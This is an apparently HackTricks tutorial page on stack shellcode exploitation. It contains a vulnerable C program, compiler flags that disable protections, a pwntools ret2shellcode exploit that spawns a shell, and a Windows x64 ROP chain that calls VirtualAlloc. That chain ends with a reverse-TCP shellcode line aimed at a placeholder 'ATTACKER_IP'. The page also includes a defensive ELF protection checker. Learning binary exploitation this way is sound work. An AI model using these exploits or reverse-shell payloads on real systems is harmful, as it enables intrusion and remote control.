Stack Shellcode
Reading time: 8 minutes
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Stack shellcode is a technique used in binary exploitation where an attacker writes shellcode onto the stack of a vulnerable program and then modifies the Instruction Pointer (IP) or Extended Instruction Pointer (EIP) to point at the location of that shellcode, causing it to be executed. It is a classic method for gaining unauthorised access or executing arbitrary commands on a target system. Below is an overview of the process, including a simple C example and how you could write a matching exploit using Python with pwntools.
C Example: Vulnerable Program
Let's start with a simple example of a vulnerable C program:
```c
#include <stdio.h>
#include <string.h>

void vulnerable_function() {
    char buffer[64];
    gets(buffer); // Unsafe function that does not check for buffer overflow
}

int main() {
    vulnerable_function();
    printf("Returned safely\n");
    return 0;
}
```
This program is vulnerable to a buffer overflow because it uses the gets() function.
Compilation
To compile this program while disabling various protections (to simulate a vulnerable environment), you can use the following command:
```bash
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
```
- -fno-stack-protector: disables the stack protector (canaries).
- -z execstack: makes the stack executable, which is required to run shellcode stored on the stack.
- -no-pie: disables Position Independent Executable (PIE), making it easier to predict the memory address where our shellcode will end up.
- -m32: compiles the program as a 32-bit executable, often used for convenience in exploit development.
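As a defender-side check added here (not code from the original page), the following Python script parses an ELF's header and program headers to report whether a binary actually lacks the protections those flags turn off, which is what decides whether stack shellcode is viable against it at all. The two sample images it builds are constructed for demonstration, and the canary check is a string heuristic that assumes a dynamically linked build.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header that records the stack's permissions
PF_X = 0x1                  # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs position-independent (PIE)

def elf_stack_protections(data: bytes) -> dict:
    """Report the three properties a stack-shellcode attack depends on.

    'nx'     : stack is non-executable (PT_GNU_STACK present without PF_X)
    'pie'    : binary is position independent (ET_DYN), so its addresses move under ASLR
    'canary' : heuristic, the image references __stack_chk_fail (dynamically linked builds)
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                        # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if data[5] == 1 else ">"         # EI_DATA: 1 = little endian
    e_type = struct.unpack_from(end + "H", data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from(end + "Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 54)
        flags_off = 4                          # p_flags directly follows p_type in Elf64_Phdr
    else:
        e_phoff = struct.unpack_from(end + "I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", data, 42)
        flags_off = 24                         # p_flags is the seventh field in Elf32_Phdr
    nx = False   # no PT_GNU_STACK at all is reported as an executable stack (conservative reading)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if struct.unpack_from(end + "I", data, off)[0] == PT_GNU_STACK:
            p_flags = struct.unpack_from(end + "I", data, off + flags_off)[0]
            nx = not (p_flags & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN, "canary": b"__stack_chk_fail" in data}

def sample_elf64(e_type: int, stack_flags: int) -> bytes:
    """Constructed minimal ELF64 image (header + one PT_GNU_STACK entry), sample input only."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)          # ELF64, little endian, version 1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + phdr

if __name__ == "__main__":
    import sys
    # Pass a real binary (e.g. ./vulnerable built above) or fall back to the constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(elf_stack_protections(f.read()))
    else:
        print("execstack, no-pie:", elf_stack_protections(sample_elf64(ET_EXEC, 7)))  # RWX stack
        print("default hardened :", elf_stack_protections(sample_elf64(ET_DYN, 6)))   # RW stack, PIE
```

Running it against the binary produced by the gcc line above should report nx, pie and canary all False; a default distro build reports all three True.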
Python Exploit using Pwntools
Here is how you could write an exploit in Python using pwntools to perform a ret2shellcode attack:
```python
from pwn import *

# Set up the process and context
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path
context.arch = 'i386'  # Specify the architecture

# Generate the shellcode
shellcode = asm(shellcraft.sh())  # Using pwntools to generate shellcode for opening a shell

# Find the offset to EIP
offset = cyclic_find(0x6161616c)  # Assuming 0x6161616c is the value found in EIP after a crash

# Prepare the payload
# The NOP slide helps to ensure that the execution flow hits the shellcode.
nop_slide = asm('nop') * (offset - len(shellcode))
payload = nop_slide + shellcode
payload += b'A' * (offset - len(payload))  # Adjust the payload size to exactly fill the buffer and overwrite EIP
payload += p32(0xffffcfb4)  # Assuming 0xffffcfb4 falls inside the NOP slide

# Send the payload
p.sendline(payload)
p.interactive()
```
This script builds a payload consisting of a NOP slide and the shellcode, then overwrites EIP with an address pointing into the NOP slide, ensuring the shellcode gets executed.
The NOP slide (asm('nop')) is used to increase the chance that execution "slides" into our shellcode regardless of the exact address. Adjust the p32() argument to the start address of your buffer plus an offset so that it lands inside the NOP slide.
Windows x64: Bypass NX with VirtualAlloc ROP (ret2stack shellcode)
On modern Windows the stack is non-executable (DEP/NX). A common way to still run stack-resident shellcode after a stack BOF is to build a 64-bit ROP chain that calls VirtualAlloc (or VirtualProtect) from the module's Import Address Table (IAT) to make the stack region executable, and then return into the shellcode appended after the chain.
Key points (Win64 calling convention):
- VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
- RCX = lpAddress → pick an address on the current stack (e.g., RSP) so the new RWX region overlaps your payload
- RDX = dwSize → large enough for chain + shellcode (e.g., 0x1000)
- R8 = flAllocationType = MEM_COMMIT (0x1000)
- R9 = flProtect = PAGE_EXECUTE_READWRITE (0x40)
- Return directly into the shellcode placed right after the chain.
Minimal strategy:
- Leak a module base (e.g., via a format string, an object pointer, etc.) to compute absolute gadget and IAT addresses under ASLR.
- Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) and call/jmp [VirtualAlloc@IAT]. If you have no direct pop r8/r9, use arithmetic gadgets to build the constants (e.g., set r8=0 and then add r9=0x40 repeatedly until you reach 0x1000).
- Place stage-2 shellcode immediately after the chain.
Example layout (conceptual):
```text
# ... padding up to saved RIP ...
# R9 = 0x40 (PAGE_EXECUTE_READWRITE)
POP_R9_RET; 0x40
# R8 = 0x1000 (MEM_COMMIT), if no POP R8, derive via arithmetic
POP_R8_RET; 0x1000
# RCX = &stack (lpAddress)
LEA_RCX_RSP_RET     # or sequence: load RSP into a GPR then mov rcx, reg
# RDX = size (dwSize)
POP_RDX_RET; 0x1000
# Call VirtualAlloc via the IAT
[IAT_VirtualAlloc]
# New RWX memory at RCX; execution continues at the next stack qword
JMP_SHELLCODE_OR_RET
# ---- stage-2 shellcode (x64) ----
```
With a constrained gadget set you can build register values indirectly, for example:
- mov r9, rbx; mov r8, 0; add rsp, 8; ret → set r9 from rbx, zero r8, and compensate the stack adjustment with a junk qword.
- xor rbx, rsp; ret → initialise rbx with the current stack pointer (rbx must be zero beforehand).
- push rbx; pop rax; mov rcx, rax; ret → move the RSP-derived value into RCX.
Pwntools sketch (assuming the base and the gadgets are known):
```python
from pwn import *

# The uppercase names below are module-relative gadget offsets; resolve them by
# reversing the target module, they are placeholders in this sketch.
base = 0x7ff6693b0000
IAT_VirtualAlloc = base + 0x400000  # example: resolve via reversing

rop = b''
# r9 = 0x40
rop += p64(base+POP_RBX_RET) + p64(0x40)
rop += p64(base+MOV_R9_RBX_ZERO_R8_ADD_RSP_8_RET) + b'JUNKJUNK'  # junk qword absorbs add rsp, 8
# rcx = rsp
rop += p64(base+POP_RBX_RET) + p64(0)           # rbx = 0 so the xor yields rsp
rop += p64(base+XOR_RBX_RSP_RET)
rop += p64(base+PUSH_RBX_POP_RAX_RET)
rop += p64(base+MOV_RCX_RAX_RET)
# r8 = 0x1000 via arithmetic if no pop r8 (r8 was zeroed above, r9 = 0x40)
for _ in range(0x1000//0x40):
    rop += p64(base+ADD_R8_R9_ADD_RAX_R8_RET)
# rdx = 0x1000 (use any available gadget)
rop += p64(base+POP_RDX_RET) + p64(0x1000)
# call VirtualAlloc and land in shellcode
rop += p64(IAT_VirtualAlloc)
rop += asm(shellcraft.amd64.windows.reverse_tcp("ATTACKER_IP", ATTACKER_PORT))
```
Notes:
- VirtualProtect works the same way if making the existing buffer RX is sufficient; the parameter order is different.
- If stack space is tight, allocate RWX elsewhere (RCX=NULL) and jmp to the new region instead of reusing the stack.
- Always account for gadgets that modify RSP (e.g., add rsp, 8; ret) by inserting junk qwords.
- ASLR should be disabled so that the address is stable across runs; otherwise the address where the function is stored will not always be the same and you would need a leak to find where the win function is loaded.
- Stack canaries should also be disabled, otherwise the corrupted EIP return address will never be followed.
- NX stack protection would prevent execution of the shellcode on the stack because that region would not be executable.
Other Examples & References
- https://ir0nstone.gitbook.io/notes/types/stack/shellcode
- https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html
  - 64bit, ASLR with a stack address leak, write shellcode and jump to it
- https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html
  - 32 bit, ASLR with a stack leak, write shellcode and jump to it
- https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html
  - 32 bit, ASLR with a stack leak, comparison to avoid the call to exit(), overwrite a variable with a value, write shellcode and jump to it
- https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/
  - arm64, no ASLR, ROP gadget to make the stack executable and jump to shellcode on the stack